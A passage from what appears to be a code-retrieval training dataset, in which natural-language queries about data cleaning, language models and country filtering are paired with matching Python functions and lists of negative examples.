defined. This is to do\n # translations w/o replacing valid/concrete DM values with something\n # like guessed values of \"UNDEFINED\" or \"N/A\".\n for rkey in sorted(translations):\n if rkey in header:\n dkey = translations[rkey]\n dval = header.get(translations[rkey], None)\n rval = header[rkey]\n if rval not in [None, \"UNDEFINED\"] and rval != dval:\n log.info(\"Setting\", repr(dkey), \"=\", repr(dval),\n \"to value of\", repr(rkey), \"=\", repr(rval))\n header[dkey] = rval\n\n header = abstract.cross_strap_header(header)\n\n # NOTE: the hacks below happen after cross-strapping and pattern handling\n # so if the keywords are still undefined they're undefined. They have to\n # be explicitly defined as UNDEFINED somehow since they're nearly universally\n # used in constraints as condition variables even if they're not used in rmaps.\n # Unlike the targets of constraints, CRDS is nominally unaware of condition\n # variables so they need to be incidentally defined. This currently doesn't\n # work out if the rmap doesn't use them. Condition variables are eval'ed in\n # expressions.\n\n if \"SUBARRAY\" not in header:\n header[\"SUBARRAY\"] = header[\"META.SUBARRAY.NAME\"] = \"UNDEFINED\"\n\n if \"EXP_TYPE\" not in header:\n header[\"EXP_TYPE\"] = header[\"META.EXPOSURE.TYPE\"] = \"UNDEFINED\"\n\n if \"USEAFTER\" not in header and \"META.USEAFTER\" in header:\n header[\"USEAFTER\"] = header[\"META.USEAFTER\"]\n if \"USEAFTER\" not in header and \"META.USEAFTER\" in header:\n header[\"USEAFTER\"] = header[\"META.USEAFTER\"]\n\n # If USEAFTER is defined, or we're configured to fake it...\n # don't invent one if its missing and we're not faking it.\n if \"USEAFTER\" in header or config.ALLOW_BAD_USEAFTER:\n\n # Identify this as best as possible,\n filename = header.get(\"FILENAME\", None) or rmapping.filename\n\n reformatted = timestamp.reformat_useafter(filename, header).split()\n header[\"DATE-OBS\"] = header[\"META.OBSERVATION.DATE\"] = reformatted[0]\n header[\"TIME-OBS\"] = header[\"META.OBSERVATION.TIME\"] = reformatted[1]\n\n log.verbose(\"reference_to_dataset output header:\\n\", log.PP(header), verbosity=80)\n\n return header",
"def language_model_dataset(self):\n ##adding sentence begin and end\n lmodel_data = copy.deepcopy(self.vector_dataset[0])\n lmodel_label = copy.deepcopy(self.vector_dataset[0])\n for tr_data, lb_data in zip(lmodel_data, lmodel_label):\n tr_data.insert(0,self.word2index(self.sentence_begin))\n lb_data.append(self.word2index(self.sentence_end))\n return lmodel_data, lmodel_label",
"def compile_ref_list(lang):\r\n\r\n # Fetching all relevant data\r\n ingred_cal = pd.read_excel(PATH + r'\\data\\ingredients_reference.xlsx', sheet_name=0).apply \\\r\n (lambda x: x.str.strip() if x.dtype == \"object\" else x)\r\n plurals = pd.read_excel(PATH + r'\\data\\ingredients_reference.xlsx', sheet_name=3).apply \\\r\n (lambda x: x.str.strip() if x.dtype == \"object\" else x)\r\n synonyms = pd.read_excel(PATH + r'\\data\\ingredients_reference.xlsx', sheet_name=4).apply \\\r\n (lambda x: x.str.strip() if x.dtype == \"object\" else x)\r\n\r\n # Add English ingredient description as a key\r\n ingred_cal.insert(0, \"en_key\", \"\")\r\n ingred_cal.loc[:, \"en_key\"] = ingred_cal[\"en\"]\r\n\r\n df_lang = ingred_cal[\r\n [\"en_key\", lang, \"type\", \"co2\", \"classification\", \"attribute\", \"variety\"]\r\n ]\r\n df_lang.loc[:, \"lower\"] = df_lang[lang].str.lower()\r\n\r\n # Add ingredient description of selected language as a key\r\n df_lang.insert(1, \"lang_key\", \"\")\r\n df_lang.loc[:, \"lang_key\"] = df_lang[lang]\r\n\r\n plurals_lang = plurals.loc[plurals[\"language\"] == lang]\r\n plurals_lang.loc[:, \"lower\"] = plurals_lang[\"singular\"].str.lower()\r\n\r\n # Merge with plurals of ingredients\r\n df2 = pd.merge(\r\n df_lang, plurals_lang, left_on=\"lower\", right_on=\"lower\", how=\"inner\"\r\n )[\r\n [\r\n \"en_key\",\r\n \"lang_key\",\r\n \"plural\",\r\n \"type\",\r\n \"co2\",\r\n \"classification\",\r\n \"attribute\",\r\n \"variety\",\r\n ]\r\n ]\r\n df2 = df2.rename(columns={\"plural\": lang})\r\n\r\n synonyms_lang = synonyms.loc[synonyms[\"language\"] == lang]\r\n synonyms_lang.loc[:, \"lower\"] = synonyms_lang[\"source\"].str.lower()\r\n\r\n # Merge with synonyms of ingredients\r\n df3 = pd.merge(\r\n df_lang, synonyms_lang, left_on=\"lower\", right_on=\"lower\", how=\"inner\"\r\n )[\r\n [\r\n \"en_key\",\r\n \"lang_key\",\r\n \"target\",\r\n \"type\",\r\n \"co2\",\r\n \"classification\",\r\n \"attribute\",\r\n \"variety\",\r\n ]\r\n ]\r\n df3 = df3.rename(columns={\"target\": lang})\r\n\r\n # Append all reference lists\r\n df_lang = df_lang[\r\n [\r\n \"en_key\",\r\n \"lang_key\",\r\n lang,\r\n \"type\",\r\n \"co2\",\r\n \"classification\",\r\n \"attribute\",\r\n \"variety\",\r\n ]\r\n ]\r\n df_lang = df_lang.append(df2)\r\n df_lang = df_lang.append(df3)\r\n\r\n df_lang = df_lang.rename(columns={lang: \"ref\"})\r\n df_lang = df_lang.reset_index(drop=True)\r\n\r\n return df_lang",
"def translate_tab(data):\n tab_str = \"\"\n sections = data.get(\"Sections\", [])\n for section in sections:\n print(\" Translating \" + section[\"Type\"])\n tab_str += translate_map[section[\"Type\"]](section)\n return tab_str",
"def build_LM(in_file):\r\n print 'building language models...'\r\n # create a new language model\r\n lm = {}\r\n # count the number of occurance of 4-grams in the training set for each language\r\n # see LANG_INDEX for the index representation\r\n count = [0,0,0]\r\n\r\n with open(in_file, 'r') as infile:\r\n for line in infile:\r\n # convert language tag to index\r\n lang = line.split(\" \")[0]\r\n # sentence with punctuation removed and all characters converted to lowercase\r\n s = re.sub('[^a-zA-Z ]', '', line[len(lang) + 1:]).lower()\r\n # count frequency of appearance for each 4-grams\r\n for i in range(-3,len(s)):\r\n # Use ^ to pad the beginning\r\n if i < 0:\r\n part = '^'*(0 - i) + s[0:4+i]\r\n # Use # to pad the end\r\n elif(i+4 > len(s)):\r\n part = s[i:len(s)] + '#'*(i+4-len(s))\r\n else:\r\n part = s[i:i+4]\r\n # create a new 4-grams record if not exist\r\n if part not in lm: \r\n lm[part] = [0,0,0]\r\n\r\n #print(\"#\"+str(i)+\" \"+part)\r\n # add frequency count by 1\r\n lm[part][LANG_TO_INDEX[lang]] += 1\r\n count[LANG_TO_INDEX[lang]] += 1\r\n #print(lm)\r\n\r\n # calculate probability with add-1 smoothing\r\n # add the size of the LM to 'token' count since we are going to do add-1 for every 4-gram\r\n count = map(lambda x: x + len(lm),count)\r\n\r\n new_lm = {}\r\n for key,value in lm.items():\r\n # probability of a 4-gram\r\n p = [0, 0, 0]\r\n for i in range(3):\r\n p[i] = (value[i] + 1.0) / count[i]\r\n # save it to the final LM\r\n new_lm[key] = p\r\n\r\n return new_lm",
"def build_sections_for_key(\n key, course, resource_bundle_dto, transformer):\n\n def add_known_translations_as_defaults(locale, sections):\n try:\n translations = i18n.get_store().get_translations(locale)\n except AssertionError:\n # We're in an environment, like ETL, where we cannot get_store()\n # because we're not in a request in the container so we don't\n # have a WSGIApplication. In that case, we return here and\n # accept some missing (nonessential) values in the output files.\n return\n\n for section in sections:\n for item in section['data']:\n if item['verb'] == VERB_NEW:\n # NOTE: The types of source values we are getting here\n # include: unicode, str, float, and None. It appears\n # to be harmless to force a conversion to unicode so\n # that we are uniform in what we are asking for a\n # translation for.\n source_value = unicode(item['source_value'] or '')\n if source_value:\n target_value = translations.gettext(source_value)\n # File under very weird: Mostly, the i18n library\n # hands back unicode instances. However,\n # sometimes it will give back a string. And\n # sometimes, that string is the UTF-8 encoding of\n # a unicode string. Convert it back to unicode,\n # because trying to do reasonable things on such\n # values (such as casting to unicode) will raise\n # an exception.\n if type(target_value) == str:\n try:\n target_value = target_value.decode('utf-8')\n except UnicodeDecodeError:\n pass\n if target_value != source_value:\n item['target_value'] = target_value\n # Flag the text as needing accepted\n item['verb'] = VERB_CHANGED\n\n schema = key.resource_key.get_schema(course)\n values = key.resource_key.get_data_dict(course)\n binding = schema_fields.ValueToTypeBinding.bind_entity_to_schema(\n values, schema)\n allowed_names = TRANSLATABLE_FIELDS_FILTER.filter_value_to_type_binding(\n binding)\n existing_mappings = []\n if resource_bundle_dto:\n for name, value in resource_bundle_dto.dict.items():\n if value['type'] == TYPE_HTML:\n source_value = value['source_value']\n target_value = ''\n else:\n source_value = value['data'][0]['source_value']\n target_value = value['data'][0]['target_value']\n\n existing_mappings.append(xcontent.SourceToTargetMapping(\n name, None, value['type'], source_value, target_value))\n\n mappings = xcontent.SourceToTargetDiffMapping.map_source_to_target(\n binding, allowed_names=allowed_names,\n existing_mappings=existing_mappings)\n\n map_lists_source_to_target = (\n xcontent.SourceToTargetDiffMapping.map_lists_source_to_target)\n\n sections = []\n for mapping in mappings:\n if mapping.type == TYPE_HTML:\n html_existing_mappings = []\n if resource_bundle_dto:\n field_dict = resource_bundle_dto.dict.get(mapping.name)\n if field_dict:\n html_existing_mappings = field_dict['data']\n context = xcontent.Context(\n xcontent.ContentIO.fromstring(mapping.source_value))\n transformer.decompose(context)\n\n html_mappings = map_lists_source_to_target(\n context.resource_bundle,\n [m['source_value'] for m in html_existing_mappings])\n source_value = mapping.source_value\n data = []\n for html_mapping in html_mappings:\n if html_mapping.target_value_index is not None:\n target_value = html_existing_mappings[\n html_mapping.target_value_index]['target_value']\n else:\n target_value = ''\n data.append({\n 'source_value': html_mapping.source_value,\n 'old_source_value': html_mapping.target_value,\n 'target_value': target_value,\n 'verb': html_mapping.verb,\n 'changed': False})\n else:\n old_source_value = ''\n if mapping.verb == VERB_CHANGED:\n existing_mapping = (\n xcontent.SourceToTargetMapping.find_mapping(\n existing_mappings, mapping.name))\n if existing_mapping:\n old_source_value = existing_mapping.source_value\n\n source_value = ''\n data = [{\n 'source_value': mapping.source_value,\n 'old_source_value': old_source_value,\n 'target_value': mapping.target_value,\n 'verb': mapping.verb,\n 'changed': False}]\n\n if any([item['source_value'] for item in data]):\n sections.append({\n 'name': mapping.name,\n 'label': mapping.label,\n 'type': mapping.type,\n 'source_value': source_value,\n 'data': data\n })\n\n if key.locale != course.app_context.default_locale:\n add_known_translations_as_defaults(key.locale, sections)\n return binding, sections",
"def prepare_ud(language):\n pattern = os.path.join(UNIVERSAL_DEPENDENCIES_DIR, \"**/*.conllu\")\n file_names = [f for f in glob(pattern, recursive=True) if language in f]\n result = []\n for file_name in file_names:\n features = prepare_one_ud_file(file_name)\n result.append(features)\n if result:\n return pd.concat(result, ignore_index=True, sort=False)\n return pd.DataFrame([], columns=COLS)",
"def add_wiktionary(self, row):\n g = self.g\n word = row['word']\n lang = row['lang']\n if lang is None:\n return\n senses = row['senses']\n pos = row['pos']\n noun_forms = row['noun_forms']\n adj_forms = row['adj_forms']\n verb_forms = row['verb_forms']\n\n word_id = self.hash(word, pos)\n lexeme_id = kgl[word_id]\n if not self.is_in_graph(word_id):\n _pos = self.link_pos(pos)\n if(_pos == None):\n print(f\"pos {pos} for word {word} not recognized, this entry will be ignored\")\n return\n\n g.add((lexeme_id, namespaces['rdf'].type, kgl.Lexeme))\n g.add((lexeme_id, pos_link, self.link_pos(pos)))\n g.add((lexeme_id, kgl_label, Literal(word, lang=\"en\")))\n g.add((lexeme_id, rdfs_label, Literal(word, lang=\"en\")))\n g.add((lexeme_id, namespaces['dct'].language, namespaces['dct'][lang]))\n g.add((lexeme_id, kgl_prop['language'], kgl[lang]))\n\n\n # Detect collision by just looking at the word label.\n # In theory we should also check that different pos may cause a collision\n # but it looks extremely unlikely\n # Unless the word has doubled entries. On that case, we ignore the problem (TODO)\n else:\n label = g.label(word_id)\n if label != word:\n print(f\"Detected collision between {label} and {word}\")\n word_id = self.hash(word + \"$42\", pos)\n lexeme_id = kgl[word_id]\n g.add((lexeme_id, pos_link, kgl[pos]))\n g.add((lexeme_id, kgl_prop.label, Literal(word, lang=\"en\")))\n g.add((lexeme_id, namespaces['rdfs'].label, Literal(word, lang=\"en\")))\n\n if row['senses']:\n self.add_sense_rec(row['senses'], word_id, lexeme_id)\n\n # Nouns\n if noun_forms:\n self.add_noun_forms(word, word_id, lexeme_id, noun_forms)\n\n # Adjectives\n if adj_forms:\n self.add_adj_forms(word, word_id, lexeme_id, adj_forms)\n\n # Verbs\n if verb_forms:\n self.add_verb_forms(word, word_id, lexeme_id, verb_forms)"
] |
{
"objective": {
"paired": [],
"self": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
If a column as no values at all (all nan), the column is removed to avoid problem later in the analysis
|
def remove_empty_column(self, df):
return df.dropna(axis=1, how='all')
|
[
"def drop_nan(df, col='mrn'):\n return df[pd.notnull(df[col])]",
"def remove_nan_and_zeroes_from_columns(df, variable):\n filtered_df = df[(df[variable].notnull()) & (df[variable]>0)]\n return filtered_df",
"def del_missings(data_frame):\n data_frame = data_frame.replace('unknown', np.nan).dropna(how='any')\n\n return data_frame",
"def remove_nan_and_zeroes_from_columns(df, variable):\n filtered_df = df[(df[variable].notnull()) & (df[variable]>0)]\n \n return filtered_df",
"def drop_missing_value(df, axis=0):\r\n reduced_df = df.dropna(axis=axis)\r\n return reduced_df",
"def drop_missing_value(dataframe):\n all_missing = []\n for col in dataframe.columns:\n if len(dataframe[col].unique()) == 1 and np.isnan(dataframe[col].unique()[0]):\n all_missing.append(col)\n\n # drop columns with all missing data\n dataframe = dataframe.drop(all_missing, inplace=False, axis=1)\n return dataframe, all_missing",
"def dropping_empty_question(self, df):\n return self.df.dropna(axis=1, how='all')",
"def delete_empty_cols(self) -> pd.DataFrame:\n full_cols = []\n for col in self.dataframe.columns:\n if self.dataframe[col].isnull().sum() / len(self.dataframe) \\\n < config.BAD_FULLNESS_RATE:\n full_cols.append(col)\n print('data_cleaning.py: Delete empty cols...')\n self.dataframe = self.dataframe[full_cols]\n return self.dataframe",
"def clean_data(dataframe):\n dataframe[dataframe.isnull()] = np.NaN\n dataframe = dataframe.dropna(subset=['connective_positions', 'sentences'])\n return dataframe",
"def get_columns_without_missing_values(self): #df dataframe\n missing_df = self.get_count_of_missing_values()\n clean_data = missing_df[missing_df[0] == 0]\n return clean_data",
"def clean_nan(df: pd.DataFrame) -> pd.DataFrame:\n return df.replace({np.nan: None})",
"def handle_NaN_values(self, df: pd.DataFrame) -> pd.DataFrame:\n ##### YOUR CODE GOES HERE #####\n pass",
"def remove_nas(\n df,\n cols_to_remove_nas=[\n \"Issue time\",\n \"Issue Date\",\n \"Latitude\",\n \"Longitude\",\n \"Location\",\n ],\n):\n for col in cols_to_remove_nas:\n df = df.loc[df[col].isna() == False]\n return df",
"def pruneNullRows(df):\n return df.dropna(axis=0, how='all')",
"def dropNaN(self, df):\n\n if isinstance(df, (pd.DataFrame, pd.Series)):\n df = df.dropna()\n else:\n pass\n return df",
"def rule_remove_blank_rows(self, data):\n if data.empty:\n return data\n\n data.dropna(axis=0, how='all', inplace=True)\n\n return data",
"def test_no_nans(self):\n self.assertTrue(read_dataframe().isnull().values.any(), \"There are NaNs!\")",
"def convert_to_none(df: pd.DataFrame) -> pd.DataFrame:\n if df.isnull().any().any():\n converted_df = df.replace(np.nan, None)\n return converted_df\n else:\n return df",
"def drop_na(self, *colnames):\n drop = Vector.fast([False], bool).repeat(self.nrow)\n for colname in colnames:\n drop = drop | self[colname].is_na()\n return self.filter_out(drop)"
] |
{
"objective": {
"paired": [],
"self": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
Remove rows that are not the appropriate country
|
def remove_not_right_country(self, df):
# Use the package pycountry to get the language from the country code
if len(self.country) == 2:
if self.country == 'uk':
country = pycountry.countries.get(alpha_2='GB'.upper())
else:
country = pycountry.countries.get(alpha_2=self.country.upper())
elif len(self.country) == 3:
country = pycountry.countries.get(alpha_3=self.country.upper())
elif len(self.country) == 4:
country = pycountry.countries.get(alpha_4=self.country.upper())
else:
raise
return df[df['socio1. In which country do you work?'] == country.name]
|
[
"def filtercountry(df, country):\n mask = df.country.eq(country)\n return df[mask]",
"def iatas_without_country():\n codes_w_country = []\n for v in IATAS_BY_COUNTRIES.values():\n codes_w_country += v\n\n if not len(codes_w_country) == len(set(codes_w_country)):\n print(f\"Total codes ({len(codes_w_country)}) - codes with a country ({len(set(codes_w_country))}) = \"\n f\"{len(codes_w_country) - len(set(codes_w_country))}, please check for double assignment: \", end=\"\")\n print([x for x in codes_w_country if codes_w_country.count(x) > 1])\n\n with open(\"./data/flight_data.csv\", 'r') as file: # open as simple text file\n lines = file.read().splitlines()\n all_codes_in_flts = list()\n for line in lines:\n if line.split(\",\")[7] not in all_codes_in_flts: # iata codes is in 8th position of every line\n all_codes_in_flts.append(line.split(\",\")[7])\n del (all_codes_in_flts[0]) # delete header entry of 8th position\n assigned = [c for c in all_codes_in_flts if c in codes_w_country] # iatas with country\n not_assigned = [c for c in all_codes_in_flts if c not in codes_w_country] # iatas without country\n\n if len(all_codes_in_flts) - len(assigned) == 0:\n return None\n else:\n return not_assigned",
"def filter_data(self):\n self.remove_rows(self.earnings_yield, 0)\n self.remove_rows(self.ret_on_capital, 0)\n self.remove_rows(\"Liq.2meses\", 0)",
"def _feature_country_process(self):\n if 'Country' not in self.df_invoice.columns:\n return\n\n list_countries_keep = ['United Kingdom']\n rows_before = self.df_invoice.shape[0]\n \n df_invoice_new = pd.DataFrame()\n for country in list_countries_keep : \n df_invoice_new = df_invoice_new.append(\\\n self._df_invoice[self.df_invoice['Country']==country]\\\n , ignore_index=True)\n\n self.df_invoice = df_invoice_new\n del(df_invoice_new)\n \n rows_after = self._df_invoice.shape[0] \n P5_SegmentClassifier.print_stat_rows(\"Countries filtering : \"\\\n , rows_before, rows_after)\n\n \n #-------------------------------------------------------------------------\n # Due to the fact only one country is used, then this feature is dropped\n #-------------------------------------------------------------------------\n list_col_to_keep = [col for col in self._df_invoice.columns \\\n if col not in 'Country']\n \n self._df_invoice = self._df_invoice[list_col_to_keep] \n\n return",
"def _filter_by_country(self):\n df = self.fdf[self.fdf['Protocol ID'].str.startswith(self.country) == True].copy()\n\n return df",
"def get_countries_cleansed(self,dfcountries):\n dfcountries.createOrReplaceTempView(\"Countries\")\n cl_dfcountries=self.spark.sql(\"\"\"\n select code as country_code,country_name,case when country_name like '%INVALID%' or country_name like '%Collapsed%' or country_name like '%No Country Code%' then 'INVALID'\n else 'VALID' end country_status from Countries c \n \"\"\")\n \n return cl_dfcountries",
"def _filter_countries(data, map=False):\n #headers = data[0].keys()\n headers = ['name', 'region', 'adminregion', 'iso2Code', 'capitalCity', u'longitude',\n 'latitude', 'incomeLevel', 'id', 'lendingType']\n results = [headers]\n for row in data:\n if not _is_country(row['iso2Code']):\n #TODO: remove them from the cache\n continue\n if map:\n results.append([_country_conversion_map(i, row[i]) for i in headers])\n else:\n results.append([row[i] for i in headers])\n return results",
"def _filter_by_country(self):\n df = self.fdf[self.fdf['Protocol ID'].str.startswith(self.country) == True]\n\n return df",
"def keep_countries_and_all(data, country_list):\n data_all = data.withColumn('country', F.lit('All'))\n\n if country_list is not None:\n data_countries = data.filter(F.col('country').isin(country_list))\n data_all = data_all.union(data_countries)\n\n return data_all",
"def filtermeasures(df, country):\n mask = ~df[country].isna()\n return df[['date', country]][mask]",
"def get_unique_countries():\n\n return set(TABLE_BETS['country'].unique())",
"def filter_country(self, update, context):\r\n \r\n pass",
"def delete_country_entry(self,country_keys):\n if self.db_connected:\n self.delete_country_data(country_keys)\n for country in country_keys:\n self.cur.execute(\"DELETE FROM countries WHERE key = :key\", {\"key\":country})",
"def drop_unwanted_data(row):\n if not row[\"PatientDOB\"]:\n raise StopProcessing()\n if row[\"SpecialtyCode\"] not in [\"600\", \"180\"]:\n raise StopProcessing()",
"def list_of_countries(country_data: List[CountryTemperature], year: int) -> set:\r\n return {row.country for row in country_data if int(row.date.strftime(\"%Y\")) > year and row.temperature is not None}",
"def remove_country():\n\n name=request.get_data().decode().split('=')[1]\n result = json.loads(dumps(db.getInstance().delete_country_by_name(name)))\n return result",
"def _subset_by_area(self, country, province):\n df = self._cleaned_df.copy()\n return df.loc[(df[self.COUNTRY] == country) & (df[self.PROVINCE] == province)]",
"def remove_non_en(tmdb_movies_df):\n\n tmdb_movies_df = tmdb_movies_df[tmdb_movies_df['original_language'] == 'en']\n \n return tmdb_movies_df",
"def filter_loans(df, exclude_by_country):\n loans_mask = False\n for country,loans in exclude_by_country.iteritems():\n loans_mask |= ((df.dwh_country_id==country) & ~(df.fk_loan.isin(loans)))\n return df[loans_mask]"
] |
{
"objective": {
"paired": [],
"self": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
Use the option set up in config file `section_nbr_to_keep_after` to know which section is considered as the prove that the participant dropped and did not reply. It uses the label `Last page` to know which last page the participant reached
|
def dropping_dead_participant(self, df):
return self.df.loc[self.df['lastpage. Last page']> self.section_nbr_to_keep_after]
|
[
"def exit_last_section() -> None:\n ContextPrinter.self.headers = ContextPrinter.self.headers[:-1]",
"def __goToLastPage(self):\n try:\n pagination_tag = self.soup.find('div', 'pagenav')\n if not pagination_tag:\n return\n uri = None\n last_page_tag = pagination_tag.find('a', title=re.compile('Last Page'))\n if last_page_tag:\n uri = last_page_tag['href']\n else:\n last_page_tag = pagination_tag.findAll('a', href=True, text=re.compile('^\\d+$'))\n if last_page_tag:\n uri = last_page_tag[-1].parent['href']\n if not uri:\n log.info(self.log_msg('Post found in only one page'))\n return\n data_dict = dict(parse_qsl(uri.split('?')[-1]))\n if 's' in data_dict.keys():\n data_dict.pop('s')\n self.currenturi = self.__baseuri + 'showthread.php?'+ urlencode(data_dict)\n self.__setSoupForCurrentUri()\n except:\n log.info(self.log_msg('Last page cannot find from the given page no \\\n for url %s'%self.task.instance_data['uri']))",
"def last_people_exit(self, n):\n for k in range(n):\n self.listPeople.remove(self.listPeople[len(self.listPeople) - (k + 1)])\n self.people = self.people - 1",
"def _walk_section(self,sec,endsec,path,lastlead,sections):\n \n sname = sec.heading.lower() if hasattr(sec,\"heading\") else \"first\"\n cbs = list(filter(lambda x: isinstance(x,ChoiceBlock), sec.items))\n found_valid = False\n \n # end section is itself a valid path\n # (at this point we assume it falls through)\n if sec is endsec:\n found_valid = True\n\n # only the end section may be choiceless\n if len(cbs)==0 and sec is not endsec:\n raise ValidationError(('Section \"%s\" has no choice blocks and so '\n +'cannot reach end of document') % sname)\n\n # iterate over choice blocks\n for b in cbs:\n \n last_block = b is cbs[-1]\n gcs = list(filter(lambda c: c.goto is not None, b.choices))\n \n # iterate over choices with gotos\n for c in gcs:\n \n last_goto = last_block and c is gcs[-1]\n target = sections[c.goto.lower()]\n newpath = path+[sec]\n newlastlead = ( len(newpath)-1 \n if found_valid or not last_goto else lastlead )\n \n # Is target a loop?\n if target in newpath:\n # must be potential exit following the section\n if newlastlead==-1 or newlastlead < newpath.index(target):\n raise ValidationError('Dead-end loop found in section \"%s\"' % sname) \n else:\n # Recurse to target section\n if self._walk_section(target,endsec,newpath,\n newlastlead,sections):\n found_valid = True\n \n # if block doesnt fall through, stop\n if not any([c.goto is None for c in b.choices]):\n # End section *must* fall all the way through\n if sec is endsec:\n raise ValidationError(('End section \"%s\" has no '\n +'choices that reach end of document') % sname)\n break\n else:\n # Fell through last block\n # Only the end section may fall through\n if sec is not endsec:\n raise ValidationError(('Section \"%s\" has one or more '\n +'choices that reach end of section and so never '\n +'reach end of document') % sname)\n \n return found_valid",
"def select_last_restart( self ):\n if self.has_kw(\"SEQNUM\"):\n self.select_restart_section( index = self.num_report_steps() - 1)\n return True\n else:\n return False",
"def previous(self, start): # 'start' is the index of the first record of current page\r\n if start < 5: # if the first index is less than 5\r\n tk.messagebox.showerror('Alert', 'This is the first page.')\r\n else:\r\n self.destroy_frame()\r\n self.start = start - 5 # index of first record of previous page = index of first record of current page - 5\r\n for i in range(5): # the 'previous' page can only display 5 records\r\n self.label_record(self.start, i)\r\n self.num = self.num + 5 # the number of records 'after' the current page to be displayed is (self.num+5)\r",
"def on_section_completed(self, prevsection, len_sections):\n self.emit(\"section_completed\", prevsection, len_sections)",
"def page_down():\r\n global currentpage, pagecount\r\n\r\n currentpage += 1\r\n topic0.config(state=NORMAL, relief=RAISED)\r\n\r\n v.set(str(currentpage))",
"def find_section_text(lines, section, go_to_end=False, section2=\"\"):\n if len(lines) == 0:\n return \"\"\n n = 0\n for line in lines:\n line_mod = line.replace(\" \", \"\")\n if line_mod.startswith(\"==%s\" % section) \\\n or (section2 != \"\" and line_mod.startswith(\"==%s\" % section2)):\n # Section started\n n += 1\n doc = \"\"\n # collect the documents till next section or the end \n newline = lines[n]\n while (go_to_end or not newline.strip().startswith('==')) \\\n and not newline.strip().startswith('[[Category'):\n doc += newline + '\\n'\n n += 1\n if n < len(lines):\n newline = lines[n]\n else:\n break\n return doc\n n += 1\n \n return \"\"",
"def PartnersLast(auction):\n try:\n bid = auction[len(auction) - 2]\n except Exception:\n bid = None\n return bid",
"def test_no_sections_with_footer(self):\n text = 'text\\n\\n[[Category:A]]'\n result = extract_sections(text, self.site)\n self._extract_sections_tests(result, 'text\\n\\n', [], '[[Category:A]]')",
"def n_sessions_until_conclusion(self):\n return max(0, self.seg_prob.details.min_results_per_assignment -\\\n self.n_sessions_w_result)",
"def _default_after(request_params, _result):\n request_params['offset'] += request_params['limit']",
"def parse_section(outputfile, nmo, energies, occupations, orbitals, has_beta):\n alpha, beta = 0, 1\n # Skip the dashes and the threshold for printing.\n next(outputfile)\n next(outputfile)\n # \"SPIN UP\"\n if has_beta:\n # Blank line only for unrestricted calculations.\n next(outputfile)\n parse_block(outputfile, nmo, energies, occupations, orbitals, alpha)\n # \"SPIN DOWN\"\n next(outputfile)\n if has_beta:\n parse_block(outputfile, nmo, energies, occupations, orbitals, beta)",
"def check_detail(self,config,name_count,sections_list,detail_flag):\n def _check_detail(group,item):\n handler_name_dict = self._heart_beat_config[\"handler_name_dict\"]\n item_class_name = None\n item_concurrency_name = None\n item_section_name = None\n for name in handler_name_dict:\n if item.startswith(name):\n item_class_name = handler_name_dict[name][0]\n item_concurrency_name = handler_name_dict[name][1]\n item_section_name = name\n break\n if item_class_name is not None and item_concurrency_name is not None:\n item_ip = config[item].get('ip')\n item_concurrency = config[item].get(item_concurrency_name,'')\n if len(item_concurrency) == 0:\n group_id = len(group)+1\n group[group_id] = {}\n group[group_id][\"text\"] = 'cfg file\\'s section %s lack the concurrency %s please repair it'%(item_section_name,item_concurrency_name)\n else:\n item_concurrency = int(item_concurrency)\n if item_class_name in name_count and item_ip in name_count[item_class_name]:\n if detail_flag =='detail' and len(name_count[item_class_name][item_ip]) < item_concurrency:\n group_id = len(group)+1\n group[group_id] = {}\n group[group_id][\"text\"] = 'the handler %s in %s should have %s concurrency but now only %s left'%(item_class_name,item_ip,item_concurrency,len(name_count[item_class_name][item_ip]))\n group[group_id][\"class_name\"] = item_class_name\n group[group_id][\"server_ip\"] = item_ip\n group[group_id][\"expected_concurrency\"] = item_concurrency\n group[group_id][\"actual_concurrency\"] = len(name_count[item_class_name][item_ip])\n\n elif item_concurrency >0:#if statistic is nothing but cfg expect someone ,add one record\n group_id = len(group)+1\n group[group_id] = {}\n group[group_id][\"text\"] = 'the handler %s in %s should have %s concurrency but now only %s left'%(item_class_name,item_ip,item_concurrency,0)\n group[group_id][\"class_name\"] = item_class_name\n group[group_id][\"server_ip\"] = item_ip\n group[group_id][\"expected_concurrency\"] = item_concurrency\n group[group_id][\"actual_concurrency\"] = 0\n else:\n pass\n return group\n return reduce(_check_detail, sections_list,{})",
"def test_with_section_no_footer(self):\n text = ('text\\n\\n'\n '==title==\\n'\n 'content')\n result = extract_sections(text, self.site)\n self._extract_sections_tests(\n result, 'text\\n\\n', [('==title==', '\\ncontent')])",
"def _versioned_datastore_after(request_params, result):\n request_params['after'] = result['after']",
"def get_next_assessment_sections(self, n):\n return # osid.assessment.AssessmentSection",
"def isPresent(notes, section):\n if len([note for note in notes if note['time'] > section[0] \\\n and note['time'] < section[1]]) > 0:\n return True\n else:\n return False"
] |
{
"objective": {
"paired": [],
"self": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
Some question may not have any answer. If the unique value of that question is array([nan]) the question is dropped
|
def dropping_empty_question(self, df):
return self.df.dropna(axis=1, how='all')
|
[
"def test_nans_replaced():\n a = rem.fix_missing()\n new_list = [x for sublist in a for x in sublist]\n unique_vals = set(new_list)\n try:\n None not in unique_vals\n '?' in unique_vals\n print \"NaNs removed, matrix has appropriate missing data symbols.\"\n except:\n raise TypeError, \"\"\"There are NoneType characters in this array, which \n RAxML cannot handle. Please check that there are no \n non-numeric characters in your input matrix.\"\"\"",
"def unanswered(self):\n return self.filter_by(answer=None)",
"def remove_nans(dataset):\n return dataset.fillna(0.0)",
"def avoid_nans_to_visualize(self, points: np.ndarray):\n if points is None:\n return None\n if np.isnan(points).any():\n if len(points[~ np.isnan(points)]) == 0:\n points = None\n else:\n points = points[~ np.isnan(points)]\n return points",
"def clean(self, X):\n idx = np.where(np.isnan(X))[0]\n if len(idx) > 0:\n print('removed {} nans'.format(len(idx)))\n X[np.isnan(X)] = 0\n return(X)",
"def pop_nan(self, dct):\n res = dict(dct)\n nans = valfilter(\n lambda x: (\n x is None or str(x).strip() == '' or\n (isinstance(x, (Decimal, float)) and isnan(x))), res)\n return dissoc(res, *nans.keys())",
"def test_sesgo_not_nan(self, df):\n self.assertFalse(df.isnull().values.any(), note=\"Las métricas de sesgo e inequidad contienen nulos\")",
"def test_no_nans(self):\n self.assertTrue(read_dataframe().isnull().values.any(), \"There are NaNs!\")",
